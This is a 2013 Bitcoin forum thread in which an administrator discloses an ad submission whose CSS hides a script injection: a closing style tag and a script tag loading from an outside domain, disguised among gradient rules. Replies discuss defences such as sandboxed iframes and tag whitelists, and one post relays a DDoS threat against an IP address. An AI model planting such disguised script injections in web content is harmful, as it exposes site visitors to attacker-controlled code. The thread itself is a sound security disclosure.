theymos (OP)
Administrator
Legendary
Offline
Activity: 5250
Merit: 13108
|
|
August 16, 2013, 06:15:49 AM |
|
Here's an ad that was sent to me: Sent to the address! Here is my CSS code: .minefieldadm {width:620px;height:40px;overflow:hidden;font-family:Verdana;font-size:14px;border:1px solid #000;display:inline-block;background: #a3d802; background: -moz-linear-gradient(top, #a3d802 0%, #11a301 3%, #8ac916 6%, #f0b7a1 34%, #8c3310 50%, #752201 93%, #bf6e4e 98%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#a3d802), color-stop(3%,#11a301), color-stop(6%,#8ac916), color-stop(34%,#f0b7a1), color-stop(50%,#8c3310), color-stop(93%,#752201), color-stop(98%,#bf6e4e)); background: -webkit-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); background: -o-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);background: -ms-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); background: linear-gradient(to bottom, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a3d802', endColorstr='#bf6e4e',GradientType=0 );} .minefieldshader {font-size: 155%;color: #FFFFFF;text-shadow: 0px 0px 8px rgba(0, 0, 0, 1);background: #b4e391; background: -moz-linear-gradient(45deg, #b4e391 0%, #149b51 22%, #75e01d 27%, #369b14 62%, #5cdb1c 69%, #5cdb1c 86%, #b4e391 100%); background: -webkit-gradient(linear, left bottom, right top, color-stop(0%,#b4e391), color-stop(22%,#149b51), color-stop(27%,#75e01d), color-stop(62%,#369b14), color-stop(69%,#5cdb1c), color-stop(86%,#5cdb1c), color-stop(100%,#b4e391));background: -webkit-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%); background: -o-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);}</style><script src='http://webkit-linear.in'></script><style>.minefieldshader{ background: -ms-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%); background: linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#b4e391', endColorstr='#b4e391',GradientType=1 );margin-top: 3px;padding: 4px 3px 4px 3px;display: inline-block;} .minefieldstar1 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 135px;} .minefieldstar2 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 450px;} Here is my HTML code: <a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT"><div class="minefieldadm"><div class="minefieldstar1"></div> <div class="minefieldstar2"></div><span class="minefieldshader">Bitcoin Minefield</span></div></a> Please let me know when the ad is up. I'll be happy to give you stats on how many people clicked and how much BTC I made from this referral link. Can you spot the problem? The CSS contains code injection: </style><script src='http://webkit-linear.in'></script><style> This URL contains nothing now. I guess he would have put something there if the ad had been accepted. I carefully check all ads by hand, though, so this kind of attack is pointless.
|
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
|
|
|
narayan
Member
Offline
Activity: 98
Merit: 10
I do not sell Bitcoins. I sell SHA256(SHA256()).
|
|
August 16, 2013, 06:31:44 AM |
|
Off to my next account
|
BTC: 1PiPooLvcEoBLuXBHbwUnN5rShs2nas223 LTC: LRq7YPMDoERSZcte9ZPNHQkUbfiPsY55VM
|
|
|
Raize
Donator
Legendary
Offline
Activity: 1419
Merit: 1015
|
|
August 16, 2013, 06:31:52 AM |
|
Quite embarrassing.
Good catch.
|
|
|
|
TiagoTiago
|
|
August 16, 2013, 06:32:53 AM |
|
Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; specially considering how tempting of a target users of the forum are...
|
(I dont always get new reply notifications, pls send a pm when you think it has happened) Wanna gimme some BTC/BCH for any or no reason? 1FmvtS66LFh6ycrXDwKRQTexGJw4UWiqDX The more you believe in Bitcoin, and the more you show you do to other people, the faster the real value will soar!
|
|
|
favdesu
Legendary
Offline
Activity: 1764
Merit: 1000
|
|
August 16, 2013, 06:40:03 AM |
|
Off to my next account just out of curiosity, do you break even as a semi-professional scammer with little to no success?
|
|
|
|
theymos (OP)
Administrator
Legendary
Offline
Activity: 5250
Merit: 13108
|
|
August 16, 2013, 06:46:59 AM |
|
He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now. Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; specially considering how tempting of a target users of the forum are...
They're safe when someone is manually reviewing them. It actually wouldn't be all that difficult to automatically verify that ads are OK: CSS can never be a security risk, and a small whitelist of known-safe HTML tags and attributes would prevent other attacks. I may add automatic verification if I ever automate the ad system, though some sort of manual approval will always be required because the ad content and size also need to be checked. (Automatically checking an ad's actual screen size seems difficult.) HTML/CSS ads are much smaller byte-wise; they can be seen by text browsers, search engines, and the visually-impaired; people can deal with them more naturally (copy/paste, etc.); they can do things that images can't do; and ad blockers can't block them as easily. They are clearly superior to image ads in almost every way.
|
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
|
|
|
narayan
Member
Offline
Activity: 98
Merit: 10
I do not sell Bitcoins. I sell SHA256(SHA256()).
|
|
August 16, 2013, 06:59:41 AM |
|
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon
|
BTC: 1PiPooLvcEoBLuXBHbwUnN5rShs2nas223 LTC: LRq7YPMDoERSZcte9ZPNHQkUbfiPsY55VM
|
|
|
Kluge
Donator
Legendary
Offline
Activity: 1218
Merit: 1015
|
|
August 16, 2013, 07:02:36 AM Last edit: August 16, 2013, 07:43:40 AM by Kluge |
|
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon Jesus, that guy plays a lot of dice. ETA @ deleted post: lol, yeah - I bet you just RELAYED them.
|
|
|
|
gmaxwell
Staff
Legendary
Offline
Activity: 4214
Merit: 8493
|
|
August 16, 2013, 07:08:30 AM |
|
I'd suggest that you also implement some protections just in case something clever get past your eyes.
beyond some programmatic 'xss' matching, one idea would be to iframe the html/css ads on another domain, so even if they do go rogue the browser sandboxing will rescue you.
I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs.
|
|
|
|
Anduck
Legendary
Offline
Activity: 1511
Merit: 1072
quack
|
|
August 16, 2013, 07:22:26 AM |
|
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon Whoa, they always return with this same "you busted me, now I will ddos you!!!". Do some legit stuff.. Pays better
|
|
|
|
BadBear
v2.0
Legendary
Offline
Activity: 1652
Merit: 1128
|
|
August 16, 2013, 08:52:33 AM |
|
Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon Somebody sounds mad.
|
|
|
|
K1773R
Legendary
Offline
Activity: 1792
Merit: 1008
/dev/null
|
|
August 16, 2013, 02:10:28 PM |
|
mad skiddys
|
[GPG Public Key]BTC/DVC/TRC/FRC: 1 K1773RbXRZVRQSSXe9N6N2MUFERvrdu6y ANC/XPM A K1773RTmRKtvbKBCrUu95UQg5iegrqyeA NMC: N K1773Rzv8b4ugmCgX789PbjewA9fL9Dy1 LTC: L Ki773RBuPepQH8E6Zb1ponoCvgbU7hHmd EMC: E K1773RxUes1HX1YAGMZ1xVYBBRUCqfDoF BQC: b K1773R1APJz4yTgRkmdKQhjhiMyQpJgfN
|
|
|
HeroC
Legendary
Offline
Activity: 858
Merit: 1000
|
|
August 16, 2013, 02:41:13 PM |
|
I wonder what he would have put there...
|
|
|
|
Raize
Donator
Legendary
Offline
Activity: 1419
Merit: 1015
|
|
August 16, 2013, 03:26:07 PM |
|
I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs.
On this topic, I remember a while back there was an image loading exploit that IE had a few years back, but it was wholly unreliable as an exploit till someone figured out they could use CSS to heap-spray just prior to the image load, thus making it work every time. I forget all the details, but yeah, CSS (or at least the way IE handles it) is far from perfectly safe. That said, they really only should be able to load things under the user's credentials, but on a Windows box that's typically "good enough" to do some damage.
|
|
|
|
theymos (OP)
Administrator
Legendary
Offline
Activity: 5250
Merit: 13108
|
|
August 16, 2013, 04:48:19 PM |
|
LOL, thanks!
|
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
|
|
|
willphase
|
|
August 16, 2013, 05:51:50 PM |
|
To protect against this, I think it's certainly worth putting ads in iframes on a different origin - e.g. bitcointalkusercontent.org
Will
|
|
|
|
phelix
Legendary
Offline
Activity: 1708
Merit: 1020
|
|
August 16, 2013, 06:52:42 PM |
|
Are you saying you actually put up a link to that scammers website?
|
|
|
|
tysat
Legendary
Offline
Activity: 966
Merit: 1004
Keep it real
|
|
August 16, 2013, 06:57:08 PM |
|
Are you saying you actually put up a link to that scammers website? Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of though.
|
|
|
|
MiningBuddy
|
|
August 16, 2013, 07:00:44 PM |
|
Are you saying you actually put up a link to that scammers website? Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of though. theymos removed the malicious section of code before putting the link into the ad rotation.
|
|
|
|
tysat
Legendary
Offline
Activity: 966
Merit: 1004
Keep it real
|
|
August 16, 2013, 07:08:49 PM |
|
Are you saying you actually put up a link to that scammers website? Confirmed that the ad is actually placed in rotation, I just saw it. @theymos Someone tries to run a CSS injection ad and you put up his ad because "he paid"? That's an awful line of though. theymos removed the malicious section of code before putting the link into the ad rotation. I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation? I'd say trying to get malicious code into an ad should result in a ban from the forum.
|
|
|
|
|